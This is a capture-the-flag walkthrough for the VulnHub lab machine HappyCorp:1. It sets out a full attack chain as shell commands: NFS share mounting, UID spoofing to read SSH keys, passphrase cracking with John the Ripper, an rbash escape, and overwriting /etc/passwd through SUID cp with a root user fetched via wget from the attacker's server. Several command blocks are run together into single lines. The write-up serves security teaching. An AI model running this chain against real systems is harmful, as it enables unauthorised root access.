This is another post on vulnhub CTF “named as “HAPPYCORP:1” by Zayotic. It is designed for VMware platform, and it is a boot to root challenge where you have to find flags to finish the task assigned by the author.
You can download it from here: https://www.vulnhub.com/entry/happycorp-1,296/
- Mount share directory
- Obtain user.txt -1st flag
- Obtain SSH key
- Cracked SSH passphrase (john the ripper)
- Login to SSH
- Break jail (rbash shell)
- Abusing SUID Binary
- Obtain flag.txt-2nd flag
Let’s start with network scanning to identify the IP of VM with the help of netdiscover.
So, we have our target IP 192.168.1.104. Now, let’s scan the services and ports via nmap.
|1||nmap -A 192.168.1.104|
We have obtained the fruitful result from the nmap scan, as you can observe so many services are running on the various port. Such as 22: SSH, 80: HTTP and so on.
As we always navigate with HTTP services first, therefore we browse http://192.168.1.104 as the URL but found nothing interesting.
We found that network share service was also available on port 2049, so we thought to check shared directory in the network. We have therefore installed NFS-client on our local machine and have a command to identify the shared directory available to mount on our local computer.
|1||showmount -e 192.168.1.104|
we found /home/karl is a shared directory that we can mount in our local machine as given below:
|1234||mkdir /tmp/rajmount 192.168.1.104:/home/karl /tmp/rajcd /tmp/rajls -al|
As I mount /home/karl in our /tmp/raj directory but I didn’t find anything here, truthfully when I try to open .ssh directory, it gave permission denied error.
Therefore, I add a user “aaru” in the group that has GID of 1001 on my Kali machine and successfully access the .ssh folder as shown in below steps (Same as the approach was used in Lin-Security).
|12||groupadd –gid 1001 aaruuseradd –uid 1001 –group raj aaru|
Then access our 1st flag i.e. user.txt and moreover copies the id_rsa key in our local machine by executing following command:
|123||sudo -u aaru ls -l .sshsudo -u aaru cat .ssh/user.txtsudo -u aaru cat .ssh/id_rsa|
Further, I explored id _rsa.pub and authorized key where I noticed Karl@happycorp and realized that Karl could be the possible username for ssh login. Therefore, I used the id_rsa key for login into ssh as karl but failed to login into it, as it required a passphrase for the key.
Then we have used ssh2john to convert this SSH key into a crackable file for John the ripper and further used the rockyou.txt wordlist for johntheripper.
|12||python ssh2john key > ssh_loginjohn –wordlist=/usr/share/wordlists/rockyou.txt crack.txt|
After obtaining the passphrase “sheep” we changed the permission of RSA key and login as karl but unfortunately, we got access of restricted shell also known rbash as a shell.
|1||ssh -i key email@example.com|
Therefore, I tried to access the bash shell directly through ssh by simply typing the following:
|1||ssh -i key firstname.lastname@example.org -t “/bin/sh”|
Luckily it works and we have successfully access the proper shell.
Now it’s time to escalate the root privilege and finish this task, therefore with help of find command I look for SUID enabled binaries, where I found SUID bit, is enabled for copy binary (/bin/cp).
|1||find / -perm -u=s -type f 2>/dev/null|
Hmm!! if suid bit is enabled on /bin/cp then we can copy any system file of root level or can overwrite the existing file. First, I have explored the /etc /passwd file where karl was end user as shown in the below image and our vision is to edit this file by adding a new user.
On other hands, we have generated a new encrypted password: pass123 using OpenSSL passwd
|1||openssl passwd -1 -salt ignite pass123|
So, we have copied the whole content of /etc/passwd file in a text editor and then create a new record for user “ignite” that owns root level permissions. Saved this file as passwd and further used python server for transferring it into victim’s machine.
Inside /tmp folder, we have downloaded our passwd file and with the help of copy command, we have replaced the original /etc/passwd from our file as shown below.
|123456||cd /tmpwget http://192.168.1.111:8000/passwdcp passwd /etc/passwdsu ignitecd rootcat root.txt|
Author: Aarti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here
ABOUT THE AUTHOR
Raj Chandel is Founder and CEO of Hacking Articles